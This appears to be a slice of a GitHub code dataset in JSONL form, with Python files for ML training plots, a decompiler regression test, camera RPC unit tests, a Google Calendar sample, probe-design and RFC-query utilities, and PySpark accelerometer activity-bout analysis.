'.pt')\n# Create count of the number of epochs\nepoch_count = range(1, len(train_loss_list) + 1)\n\n# Visualize loss history\nplt.plot(epoch_count, train_loss_list, 'r--')\nplt.plot(epoch_count, test_loss_list, 'b-')\nplt.legend(['Training Loss', 'Test Loss'])\nplt.xlabel('Epoch')\nplt.ylabel('Loss')\nplt.savefig('/home/anup/work/multilabel/losses/' + str(VERSION) + '.jpg')\nplt.show()\n\n\n\n \n","repo_name":"anupkhalam/Damage-Detection-Demo","sub_path":"train_01.py","file_name":"train_01.py","file_ext":"py","file_size_in_byte":6554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"37400709017","text":"from regression_tests import *\n\nclass TestBase(Test):\n def test_produce_expected_output(self):\n self.assert_c_produces_output_when_run(\n input='1 2 3',\n expected_return_code=4,\n expected_output='XYZ\\n'\n )\n self.assert_c_produces_output_when_run(\n input='0 10 0',\n expected_return_code=3,\n expected_output='XY\\n'\n )\n\nclass Test_2018(TestBase):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', excluding=r'.*\\.exe'),\n )\n\nclass Test_2018_x64Pe(Test):\n settings_2018 = TestSettings(\n input=files_in_dir('2018-09-17', matching=r'.*\\.exe'),\n )\n\n def test_check_function_func(self):\n assert self.out_c.has_func('func')\n func = self.out_c.funcs['func']\n assert func.return_type.is_int(32)\n assert func.param_count == 0\n assert func.has_any_if_stmts()\n assert func.has_any_return_stmts()\n assert func.calls('scanf')\n assert func.calls('printf') or func.calls('puts')\n if func.calls('printf'):\n assert self.out_c.has_string_literal('XYZ\\\\n')\n assert self.out_c.has_string_literal('XY\\\\n')\n assert self.out_c.has_string_literal('X\\\\n')\n\n elif func.calls('puts'):\n assert self.out_c.has_string_literal('XYZ')\n assert self.out_c.has_string_literal('XY')\n assert self.out_c.has_string_literal('X')\n\n def test_check_funcion_main(self):\n assert self.out_c.has_func('main')\n assert self.out_c.funcs['main'].calls('func')\n assert self.out_c.funcs['main'].has_any_return_stmts()\n assert len(self.out_c.funcs['main'].return_stmts) == 1\n\n def test_check_presence_of_literals(self):\n assert self.out_c.has_string_literal('%d %d %d')\n\nclass Test_2017(TestBase):\n settings_2017 = TestSettings(\n input=files_in_dir('2017-11-14'),\n )\n\nclass Test_2015(TestBase):\n settings_2015 = TestSettings(\n input=files_in_dir('2015-03-30'),\n )\n","repo_name":"avast/retdec-regression-tests","sub_path":"integration/nested-if-returns/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"}
+{"seq_id":"32191744759","text":"from unittest import TestCase\ntry:\n from source import O2x5xxRPCDevice\n from tests.utils import *\n from .config import *\nexcept ModuleNotFoundError:\n import os\n import sys\n sys.path.insert(0, '../source')\n from utils import *\n from config import *\nimport numpy as np\nimport warnings\nimport time\n\n\nclass TestRPC_MainAPI(TestCase):\n rpc = None\n session = None\n config_backup = None\n active_application_backup = None\n pin_layout = None\n\n @classmethod\n def setUpClass(cls):\n cls.rpc = O2x5xxRPCDevice(deviceAddress)\n cls.session = cls.rpc.requestSession()\n cls.config_backup = cls.session.exportConfig()\n cls.active_application_backup = cls.rpc.getParameter(\"ActiveApplication\")\n configFile = getImportSetupByPinLayout(rpc=cls.rpc)['config_file']\n configFile = cls.session.readConfigFile(configFile=configFile)\n cls.session.importConfig(configFile, global_settings=True, network_settings=False, applications=True)\n cls.rpc.switchApplication(1)\n\n @classmethod\n def tearDownClass(cls):\n cls.session.importConfig(cls.config_backup, global_settings=True, network_settings=False, applications=True)\n if cls.active_application_backup != \"0\":\n cls.rpc.switchApplication(cls.active_application_backup)\n cls.session.cancelSession()\n\n def setUp(self):\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed.*\")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed \")\n warnings.filterwarnings(\"ignore\", category=ResourceWarning, message=\"unclosed running multiprocessing pool.*>\")\n self.rpc.switchApplication(1)\n\n def test_getParameter(self):\n result = self.rpc.getParameter(value=\"DeviceType\")\n self.assertIsInstance(result, str)\n self.assertEqual(len(result), 5)\n\n def test_getAllParameters(self):\n result = self.rpc.getAllParameters()\n self.assertIsInstance(result, dict)\n\n def test_getSWVersion(self):\n result = self.rpc.getSWVersion()\n self.assertIsInstance(result, dict)\n\n def test_getHWInfo(self):\n result = self.rpc.getHWInfo()\n self.assertIsInstance(result, dict)\n\n def test_getDmesgData(self):\n result = self.rpc.getDmesgData()\n self.assertIsInstance(result, str)\n\n def test_getClientCompatibilityList(self):\n result = self.rpc.getClientCompatibilityList()\n self.assertIsInstance(result, list)\n\n def test_getApplicationList(self):\n result = self.rpc.getApplicationList()\n self.assertIsInstance(result, list)\n self.assertIsInstance(result[0], dict)\n self.assertIsInstance(result[1], dict)\n self.assertIsInstance(result[2], dict)\n self.assertIsInstance(result[3], dict)\n self.assertIsInstance(result[4], dict)\n self.assertIsInstance(result[5], dict)\n\n def test_switchApplication(self):\n initial_application = int(self.rpc.getParameter(\"ActiveApplication\"))\n if initial_application > 1:\n self.rpc.switchApplication(applicationIndex=1)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 1)\n else:\n self.rpc.switchApplication(applicationIndex=2)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), 2)\n time.sleep(5)\n # Switch back to initial application\n self.rpc.switchApplication(applicationIndex=initial_application)\n while self.rpc.getParameter(\"OperatingMode\") != \"0\":\n time.sleep(1)\n self.assertEqual(int(self.rpc.getParameter(\"ActiveApplication\")), initial_application)\n\n def test_getTraceLogs(self):\n numberLogs = 10\n traces = self.rpc.getTraceLogs(nLogs=numberLogs)\n self.assertIsInstance(traces, list)\n self.assertEqual(len(traces), numberLogs)\n\n def test_getApplicationStatisticData(self):\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n result = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n self.assertIsInstance(result, dict)\n\n def test_getReferenceImage(self):\n result = self.rpc.getReferenceImage()\n self.assertIsInstance(result, np.ndarray)\n\n def test_isConfigurationDone(self):\n result = self.rpc.isConfigurationDone()\n self.assertTrue(result)\n\n def test_waitForConfigurationDone(self):\n self.rpc.waitForConfigurationDone()\n\n def test_measure(self):\n input_measure_line = {\n \"geometry\": \"line\",\n \"pixel_positions\": [\n {\n \"column\": 980,\n \"row\": 374\n },\n {\n \"column\": 603,\n \"row\": 455\n }\n ]\n }\n\n input_measure_rect = {\n \"geometry\": \"rect\",\n \"pixel_positions\": [\n {\n \"column\": 376,\n \"row\": 426\n },\n {\n \"column\": 710,\n \"row\": 651\n }\n ]\n }\n\n input_measure_circle = {\n \"geometry\": \"circle\",\n \"pixel_positions\": [\n {\n \"column\": 647,\n \"row\": 452\n },\n {\n \"column\": 775,\n \"row\": 533\n }\n ]\n }\n\n result = self.rpc.measure(measureInput=input_measure_line)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_rect)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n result = self.rpc.measure(measureInput=input_measure_circle)\n self.assertIsInstance(result, dict)\n self.assertTrue(result)\n\n def test_trigger(self):\n number_trigger = 100\n application_active = self.rpc.getParameter(value=\"ActiveApplication\")\n initial_application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n initial_number_of_frames = initial_application_stats['number_of_frames']\n for i in range(number_trigger):\n answer = self.rpc.trigger()\n self.assertTrue(answer)\n application_stats = self.rpc.getApplicationStatisticData(applicationIndex=int(application_active))\n number_of_frames = application_stats['number_of_frames']\n self.assertEqual(number_of_frames, initial_number_of_frames + number_trigger)\n\n def test_doPing(self):\n result = self.rpc.doPing()\n self.assertEqual(result, \"up\")\n","repo_name":"ifm/o2x5xx-python","sub_path":"tests/test_rpc.py","file_name":"test_rpc.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"36"}
+{"seq_id":"4848876608","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n#\r\n# Copyright 2014 Google Inc. All Rights Reserved.\r\n#\r\n# Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# http://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n\"\"\"Simple command-line sample for the Calendar API.\r\nCommand-line application that retrieves the list of the user's calendars.\"\"\"\r\n\r\nimport sys\r\n\r\nfrom oauth2client import client\r\nfrom googleapiclient import sample_tools\r\n\r\nimport datetime\r\n\r\n_calendar_id = 'mamie.lora06@gmail.com'\r\n_found_calendar = None\r\n\r\n\r\ndef main(argv):\r\n # Authenticate and construct service.\r\n service, flags = sample_tools.init(\r\n argv, 'calendar', 'v3', __doc__, __file__,\r\n scope='https://www.googleapis.com/auth/calendar.readonly')\r\n\r\n try:\r\n page_token = None\r\n \r\n \r\n now = datetime.datetime.utcnow().isoformat() + 'Z' # 'Z' indicates UTC time\r\n print('Getting the upcoming 10 events')\r\n eventsResult = service.events().list(\r\n calendarId='primary', timeMin=now, maxResults=10, singleEvents=True,\r\n orderBy='startTime').execute()\r\n \r\n events = eventsResult.get('items', [])\r\n\r\n if not events:\r\n print('No upcoming events found.')\r\n for event in events:\r\n start = event['start'].get('dateTime', event['start'].get('date'))\r\n print(start, event['summary'])\r\n\r\n \r\n while True:\r\n calendar_list = service.calendarList().list(\r\n pageToken=page_token).execute()\r\n for calendar_list_entry in calendar_list['items']:\r\n \r\n print(calendar_list_entry['summary'])\r\n \r\n calendarId = calendar_list_entry['id']\r\n if calendarId == _calendar_id:\r\n _found_calendar = calendar_list_entry\r\n break\r\n \r\n \r\n page_token = calendar_list.get('nextPageToken')\r\n if not page_token:\r\n break\r\n \r\n _found_calendar\r\n \r\n except client.AccessTokenRefreshError:\r\n print('The credentials have been revoked or expired, please re-run'\r\n 'the application to re-authorize.')\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)","repo_name":"MamieLora/TOCS2017","sub_path":"KeeeXClient/src/GoogleCalendarClient/ListEvents.py","file_name":"ListEvents.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"25852159732","text":"\"\"\"Functions for generating lists of candidate probes from sequences.\n\nThese functions compute lists of many (likely redundant) probes, termed\ncandidate probes, from a sequence of list of sequences.\n\"\"\"\n\nimport logging\nimport re\nimport sys\n\nimport numpy as np\n\nfrom catch import probe\nfrom catch.utils import seq_io\n\n__author__ = 'Hayden Metsky '\n\nlogger = logging.getLogger(__name__)\n\n\ndef make_candidate_probes_from_sequence(seq,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None):\n \"\"\"Generate a list of candidate probes from a sequence.\n\n It is possible (especially when there are strings of N's) that\n duplicate probes are returned.\n\n Args:\n seq: sequence as a string or np.array from which to generate\n candidate probes\n probe_length: generate candidate probes with this number of bp\n probe_stride: generate probes from seq separated by this number\n of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n n_string_query = re.compile('(N{' + str(min_n_string_length) + ',})')\n\n if len(seq) < probe_length:\n if allow_small_seqs:\n if len(seq) < allow_small_seqs:\n raise ValueError((\"Allowing sequences smaller than the probe \"\n \"length (\" + str(probe_length) + \"), but \"\n \"input sequence is smaller than minimum \"\n \"allowed length\"))\n else:\n if n_string_query.search(seq):\n raise Exception((\"Only possible probe from input \"\n \"sequence has too long a stretch of N's\"))\n else:\n # Make a probe equal to this sequence\n return [probe.Probe.from_str(seq)]\n else:\n raise ValueError((\"An input sequence is smaller than the probe \"\n \"length (\" + str(probe_length) + \"); try \"\n \"setting --small-seq-skip\"))\n\n if isinstance(seq, np.ndarray):\n seq = ''.join(seq)\n\n # Make a probe based on the subsequence seq[start:end].\n # Namely, if that subsequence contains no string of N's, then it\n # is a probe to be added and the probe is returned in a single-\n # valued list. Otherwise, an empty list is returned.\n def add_probe_from_subsequence(start, end,\n is_flanking_n_string=False):\n subseq = seq[start:end]\n probes = []\n\n # Search for strings of min_n_string_length or more N's in subseq\n # and only add a probe if there is not such a string\n if not n_string_query.search(subseq):\n # There's no string of N's, so this subsequence is a valid\n # probe\n probes += [subseq]\n\n # Convert the probes from a Python list of Python strings to a\n # list of probe.Probe\n probes = [probe.Probe.from_str(p) for p in probes]\n for p in probes:\n p.is_flanking_n_string = is_flanking_n_string\n\n return probes\n\n # Populate a list of probes\n probes = []\n for start in np.arange(0, len(seq), probe_stride):\n if start + probe_length > len(seq):\n break\n probes += add_probe_from_subsequence(start, start + probe_length)\n\n if len(seq) % probe_stride != 0:\n # There are bases on the right that were never covered, so add\n # another probe for this\n probes += add_probe_from_subsequence(len(seq) - probe_length,\n len(seq))\n\n # Add probes flanking each string of N's. Specifically, add a probe\n # to the left of a string and to the right. The called function\n # must check that the flanking probe does not contain a string of\n # N's before adding. (Don't recursively chase flanking probes.)\n for match in n_string_query.finditer(seq):\n if match.start() - probe_length >= 0:\n # Add the left flanking probe for match\n probes += add_probe_from_subsequence(match.start() - probe_length,\n match.start(),\n is_flanking_n_string=True)\n if match.end() + probe_length <= len(seq):\n # Add the right flanking probe for match\n probes += add_probe_from_subsequence(match.end(),\n match.end() + probe_length,\n is_flanking_n_string=True)\n\n return probes\n\n\ndef make_candidate_probes_from_sequences(\n seqs,\n probe_length,\n probe_stride,\n min_n_string_length=2,\n allow_small_seqs=None,\n seq_length_to_skip=None):\n \"\"\"Generate a list of candidate probes from a list of sequences.\n\n It is possible (perhaps even likely depending on where\n the sequences come from) that duplicate probes are returned.\n\n Args:\n seqs: list of sequences, each as a string or np.array from which\n to generate candidate probes\n probe_length: generate candidate probes with this number of bp\n probe_stride: generate probes from each sequence separated by this\n number of bp\n min_n_string_length: possible probes that would contain strings\n of this number or more N's are discarded and, instead, new\n probes flanking the string are added\n allow_small_seqs: if set, allow sequences that are smaller than the\n probe length by creating candidate probes equal to the sequence;\n the value gives the minimum allowed probe (sequence) length\n seq_length_to_skip: if set, skip sequences whose length is <=\n the given value (i.e., do not design candidate probes for\n them)\n\n Returns:\n list of candidate probes as instances of probe.Probe\n \"\"\"\n if not isinstance(seqs, list):\n raise TypeError(\"seqs must be a list of sequences\")\n if len(seqs) == 0:\n raise ValueError(\"seqs must have at least one sequence\")\n for seq in seqs:\n if not isinstance(seq, str):\n raise TypeError(\"seqs must be a list of Python strings\")\n\n probes = []\n for seq in seqs:\n if seq_length_to_skip is not None:\n if len(seq) <= seq_length_to_skip:\n logger.info((\"Not designing candidate probes for a \"\n \"sequence with length %d, since it is <= %d\"),\n len(seq), seq_length_to_skip)\n continue\n\n probes += make_candidate_probes_from_sequence(\n seq,\n probe_length=probe_length,\n probe_stride=probe_stride,\n min_n_string_length=min_n_string_length,\n allow_small_seqs=allow_small_seqs)\n\n return probes\n","repo_name":"broadinstitute/catch","sub_path":"catch/filter/candidate_probes.py","file_name":"candidate_probes.py","file_ext":"py","file_size_in_byte":7463,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"36"}
+{"seq_id":"36386987899","text":"#!/usr/bin/env python3\nfrom ietf.sql.bcp import Bcp\nfrom ietf.sql.fyi import Fyi\nfrom ietf.sql.rfc import Rfc\nfrom ietf.sql.rfc_not_issued import RfcNotIssued\nfrom ietf.sql.std import Std\nfrom ietf.xml.enum import DocumentType\n\n\ndef query_rfc(session, number):\n row = session.query(Rfc).\\\n filter(Rfc.id == number).\\\n one_or_none()\n return row\n\n\ndef query_rfc_updates(session, number):\n \"\"\"Return the most up-to-date document for RFC `number`.\"\"\"\n orig = query_rfc(session, number)\n # If there are no updates then return the original\n if (orig is None) or (not orig.updated_by):\n return orig\n # Else return the latest document\n else:\n update_doc = orig.updated_by[-1]\n update_type = update_doc.doc_type\n update_id = update_doc.doc_id\n if update_type is DocumentType.RFC:\n return query_rfc(session, update_id)\n elif update_type is DocumentType.STD:\n return query_std(session, update_id)\n elif update_type is DocumentType.BCP:\n return query_bcp(session, update_id)\n elif update_type is DocumentType.FYI:\n return query_fyi(session, update_id)\n else:\n return orig\n\n\ndef query_rfc_obsoletes(session, number):\n \"\"\"Return the latest RFC that obsoletes `number` if such an RFC exists,\n otherwise return RFC `number`.\"\"\"\n # Lookup RFC `number`\n cur_rfc = query_rfc(session, number)\n # If there is no updated_by then return the original\n if (cur_rfc is None) or (not cur_rfc.obsoleted_by):\n return cur_rfc\n # Else recurse\n else:\n obsoleting_id = cur_rfc.obsoleted_by[-1].doc_id\n return query_rfc_obsoletes(session, obsoleting_id)\n\n\ndef query_rfc_see_also(session, number):\n return None\n\n\ndef query_rfc_not_issued(session, number):\n \"\"\"Return an RfcNotIssued object or None.\"\"\"\n row = session.query(RfcNotIssued).\\\n filter(RfcNotIssued.id == number).\\\n one_or_none()\n return row\n\n\ndef query_std(session, number):\n row = session.query(Std).\\\n filter(Std.id == number).\\\n one_or_none()\n return row\n\n\ndef query_bcp(session, number):\n row = session.query(Bcp).\\\n filter(Bcp.id == number).\\\n one_or_none()\n return row\n\n\ndef query_fyi(session, number):\n row = session.query(Fyi).\\\n filter(Fyi.id == number).\\\n one_or_none()\n return row\n","repo_name":"lafrenierejm/ietf-cli","sub_path":"ietf/utility/query_doc.py","file_name":"query_doc.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"10705832440","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import functions as F\nfrom datetime import datetime, timedelta\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import TimestampType\nfrom pyspark.sql.types import IntegerType\nimport datefinder\nimport time\n\n##########################################################################################################\n\ndef queryrows(df, string):\n \"\"\"\n Select the rows which match a given string.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param string:\n matching string\n :return:\n Spark DataFrame object with filtered values\n \"\"\"\n\n filter_value = df.schema.names[0] + \" like '%\" + string + \"%'\"\n\n return df.filter(filter_value).collect()[0][0]\n\n\n##########################################################################################################\n\ndef gen_acc_dataframe(df, ts_name):\n \"\"\"\n Generate accelerometer DataFrame from raw data with timestamp column.\n\n :param df:\n Spark DataFrame object containing the accelerometer raw data\n :param ts_name:\n name of timestamp column\n :return:\n input data epoch, Spark DataFrame object with timestamp data\n \"\"\"\n\n ## extract metadata from RDD object\n start_date = queryrows(df, 'Start Date').split()[2]\n start_time = queryrows(df, 'Start Time').split()[2]\n interval = queryrows(df, 'Period').split()[3]\n dateformat = queryrows(df, 'Data File Created By').split()\n\n if len(dateformat) < 14:\n\n dt = datefinder.find_dates(start_date + \" \" + start_time)\n start_timestamp = [ts for ts in dt][0]\n\n else:\n\n date_dict = {'M/d/yyyy': ['%m/%d/%Y', '%m/%d/%Y'],\n 'dd-MMM-yy': ['%d/%m/%Y', '%d-%b-%y'],\n 'dd-MM-yyyy': ['%d/%m/%Y', '%d-%m-%Y'],\n 'dd/MM/yyyy': ['%d/%m/%Y', '%d/%m/%Y']\n }\n\n dt = dateformat[13]\n datetime_format = [date_dict[dt][0] + ' %H:%M:%S', date_dict[dt][1] + ' %H:%M:%S']\n start_timestamp = datetime.strptime(start_date + \" \" + start_time, datetime_format[0])\n\n x = time.strptime(interval, '%H:%M:%S')\n\n interval_sec = timedelta(hours=x.tm_hour, minutes=x.tm_min, seconds=x.tm_sec)\n\n ## extract accelerometer data from RDD object\n acc_data = df.filter(\"not value like '%Current%'\")\n acc_data = acc_data.filter(\"not value like '%Axis%'\")\n acc_data = acc_data.filter(\"value like '%,%'\") # TODO: change 'value' as 'df.schema.names[0]'\n acc_data = acc_data.cache()\n acc_data = acc_data.checkpoint()\n acc_data.count()\n acc_data = acc_data.selectExpr('value as acc_data') # change column name to 'acc_data'\n acc_data = acc_data.withColumn('id', F.monotonically_increasing_id())\n\n app_fun = F.udf(lambda k: start_timestamp + k * interval_sec, TimestampType())\n\n acc_data = acc_data.withColumn(ts_name, app_fun(acc_data['id'])).select([ts_name, 'acc_data'])\n\n return interval_sec.seconds, acc_data\n\n\n##########################################################################################################\n\ndef split_acc_data(df, col_list):\n \"\"\"\n Reads string of data from accelerometer DataFrame.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param col_list:\n list of feature names matching accelerometer data\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = F.split(df['acc_data'], r',')\n\n for k, item in enumerate(col_list):\n df = df.withColumn(item, cols.getItem(k).cast(dataType=IntegerType()))\n\n df = df.drop('acc_data')\n\n return df\n\n\n##########################################################################################################\n\ndef activity_count(df, datetime_col, interval, LightCO, ModerateCO, HardCO, VeryHardCO, incl_acc=False):\n \"\"\"\n Return activity count calculated from accelerometer data.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param datetime_col:\n column with timestamp data\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n :param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :param incl_acc:\n if true, all raw accelerometer data are included in the DataFrame\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df = df.cache()\n df = df.checkpoint()\n df.count()\n\n cols = df.columns\n\n app_fun = F.udf(lambda x: activity_index(x, interval, LightCO, ModerateCO, HardCO, VeryHardCO))\n\n ## use the axis1 or vectMag to determine the activity count\n df = df.withColumn('activity', F.col(cols[1]))\n\n df = df.withColumn('activityIntensity', app_fun(df['activity'])).orderBy(datetime_col)\n\n cols.insert(1, 'activity')\n\n cols.insert(2, 'activityIntensity')\n\n if not incl_acc:\n\n df = df.select(cols[0:3]).orderBy(datetime_col)\n\n else:\n\n df = df.select(cols).orderBy(datetime_col)\n\n return df\n\n\n##########################################################################################################\n\ndef activity_index(AC, interval, LightCO, ModerateCO, HardCO, VeryHardCO):\n \"\"\"\n Calculate activity intensity level using Freedson adult cut points (Freedson, Melanson, & Sirard, 1998).\n\n :param AC:\n activity count per epoch\n :param interval:\n epoch duration (in seconds)\n :param LightCO:\n light activity cutoff value\n :param ModerateCO:\n moderate activity cutoff value\n :param HardCO:\n hard activity cutoff value\n :param VeryHardCO:\n very hard activity cutoff value\n :return:\n integer value corresponding to the activity intensity\n \"\"\"\n\n ## assume epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## normalize the cutoffs per epoch\n n = 60 / interval\n VeryHardCO = VeryHardCO / n\n HardCO = HardCO / n\n ModerateCO = ModerateCO / n\n LightCO = LightCO / n\n\n if AC == -1:\n act_index = -1 # state unknown\n elif AC == -2:\n act_index = -2 # not wearing device\n elif 0 <= AC < LightCO:\n act_index = 0 # sedentary\n elif LightCO <= AC < ModerateCO:\n act_index = 1 # light activity\n elif ModerateCO <= AC < HardCO:\n act_index = 2 # moderate activity\n elif HardCO <= AC < VeryHardCO:\n act_index = 3 # hard activity\n else:\n act_index = 4 # very hard activity\n\n return act_index\n\n\n##########################################################################################################\n### NOT USED ###\ndef datetime_filter(df, param_name, param_value, datetime_name, time_w=90, step=90 * 60):\n \"\"\"\n Remove rows in DataFrame which match a condition within a given time interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param param_name:\n parameter name\n :param param_value:\n parameter value for conditional statement\n :param datetime_name:\n column with timestamp data\n :param time_w:\n tumbling window duration (in minutes)\n :param step:\n sliding interval (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## tumbling window size\n tw = str(time_w) + ' minutes'\n\n ## sliding window size\n sw = str(step) + ' seconds'\n\n ## offset (in seconds)\n offset = str(0) + ' seconds'\n\n intervals_df = df.groupBy(F.window(datetime_name, '{}'.format(tw), '{}'.format(sw), '{}'.format(offset))) \\\n .avg(param_name) \\\n .sort('window.start') \\\n .filter(F.col('avg({})'.format(param_name)) == param_value) \\\n .select('window') \\\n .withColumn('start', F.col('window').start) \\\n .withColumn('end', F.col('window').end) \\\n .drop('window')\n\n \"\"\"\n schema of internal_df:\n \n root\n |-- start: timestamp (nullable = true)\n |-- end: timestamp (nullable = true)\n \"\"\"\n\n ## transform dataframe into list of pyspark.sql.types.Row objects\n intervals_list = intervals_df.collect()\n\n ## filter dataframe excluding the selected intervals\n for row in intervals_list:\n df = df.filter(~F.col(datetime_name).between(row[0], row[1]))\n\n return intervals_df, df\n\n\n##########################################################################################################\n### NOT USED ###\ndef start_time_offset(df):\n \"\"\"\n Return the offset to start a tumbling window from the first timestamp of the DataFrame.\n\n :param df:\n Spark DataFrame object with timestamp data\n :return:\n number of seconds\n \"\"\"\n\n ## notice: the resulting offset must be smaller than the tumbling window\n st_date = df.first()[0]\n st_min = st_date.minute\n st_sec = st_date.second\n start_time = (st_min - 10 * (st_min // 10)) * 60 + st_sec\n offset = '{} seconds'.format(str(start_time))\n\n return offset\n\n\n##########################################################################################################\n\ndef consecutive_time(df, ts_name, interval):\n \"\"\"\n Add two columns with the start date and end date of consecutive timestamps which differ by a given interval.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param interval:\n required precision (in seconds)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n df_ = df.withColumn(\"rn\", F.row_number().over(Window.orderBy('{}'.format(ts_name))))\n\n df_ = df_.cache()\n df_ = df_.checkpoint()\n df_.count()\n\n df_.createOrReplaceTempView('df_')\n\n spark = SparkSession.builder.getOrCreate()\n\n df_ = spark.sql(\"\"\" WITH tmp AS(\n SELECT *, BIGINT({}) - rn * {} AS totsec\n FROM df_)\n SELECT *, MIN({}) OVER(PARTITION BY totsec) AS start, \n MAX({}) OVER(PARTITION BY totsec) AS end,\n ROW_NUMBER() OVER(PARTITION BY totsec ORDER BY {}) AS id\n FROM tmp\n \"\"\".format(ts_name, str(interval), ts_name, ts_name, ts_name)).drop('totsec').drop('rn')\n\n df_.createOrReplaceTempView('df_')\n\n df_ = spark.sql(\"\"\" SELECT *, BIGINT(start) - LAG(BIGINT(end),1,BIGINT(end)) OVER(ORDER BY timestamp) AS pause\n FROM df_\n \"\"\")\n\n return df_\n\n\n##########################################################################################################\n\ndef detect_bouts(df, ts_name, col_name, new_col, interval, UP, LOW, DURATION, TOL):\n \"\"\"\n Create a new column based on filters on timestamps.\n\n :param df:\n Spark DataFrame object with timestamp data\n :param ts_name:\n column with timestamp data\n :param col_name:\n column on which the filter must be applied\n :param new_col:\n column with applied filters\n :param interval:\n epoch duration (in seconds)\n :param UP:\n upper limit of activity count per minute\n :param LOW:\n lower limit of activity count per minute\n :param DURATION:\n minimum bout duration (in minutes)\n :param TOL:\n tolerance (in minutes)\n :return:\n Spark DataFrame object with timestamp data\n \"\"\"\n\n ## assume one epoch smaller than 1 minute\n assert interval <= 60, \"Epoch larger than 1 minute.\"\n\n ## number of epochs per minute\n n = 60 / interval\n\n ## bounds on measured quantitity per epoch\n up, low = (UP / n, LOW / n)\n\n ## convert tolerance in seconds\n tol = TOL * 60\n\n ## number of epoch in tolerance interval\n epochs_tol = tol / interval\n\n ## convert minimum bout duration in seconds\n duration = DURATION * 60\n\n ## Number of epochs in minimum bout duration\n epochs_min_bout = duration / interval\n\n ## filter dataframe with: low <= col_name <= up\n inbout = (F.col('{}'.format(col_name)) >= low) & (F.col('{}'.format(col_name)) <= up)\n df1 = df.filter(inbout).orderBy('{}'.format(ts_name))\n df1.checkpoint()\n\n ## determine consecutive timestamps in df1\n df1 = consecutive_time(df1, '{}'.format(ts_name), interval)\n df1 = df1.selectExpr(['{}'.format(ts_name), 'start as activity_start'])\n\n pause_list = 0\n\n if TOL > 0:\n ## filter data with col_name < low and col_name > up\n df2 = df.filter(~inbout).orderBy('{}'.format(ts_name))\n df2 = df2.cache()\n df2 = df2.checkpoint()\n df2.count()\n\n ## determine consecutive timestamps in df2\n df2 = consecutive_time(df2, '{}'.format(ts_name), interval)\n df2 = df2.selectExpr(['{}'.format(ts_name), 'start as pause_start'])\n\n ## filter periods larger than tolerance\n df2 = df2.groupBy('pause_start').count()\n df2 = df2.filter(df2['count'] > epochs_tol).orderBy('pause_start')\n df2 = df2.withColumn('pause_end', (F.col('pause_start').cast(IntegerType()) +\n (F.col('count') - 1) * interval).cast(TimestampType())\n ).drop('count')\n\n pause_list = df2.collect()\n\n ## merge df1 to the accelerometer dataframe\n df3 = df.join(df1, ['{}'.format(ts_name)], 'leftouter')\n df3.checkpoint()\n\n if TOL > 0:\n\n ## assign pause periods\n df3 = df3.withColumn('pause', F.lit(0))\n\n for row in pause_list:\n df3 = df3.withColumn('pause', F.when((F.col('{}'.format(ts_name)) >= row['pause_start']) &\n (F.col('{}'.format(ts_name)) <= row['pause_end']),\n 1).otherwise(F.col('pause'))\n )\n\n ## assign previous non-zero 'start' to missing values given 'pause' < tolerance\n df3 = df3.withColumn('activity_start', F.when((F.col('activity_start').isNull()) &\n 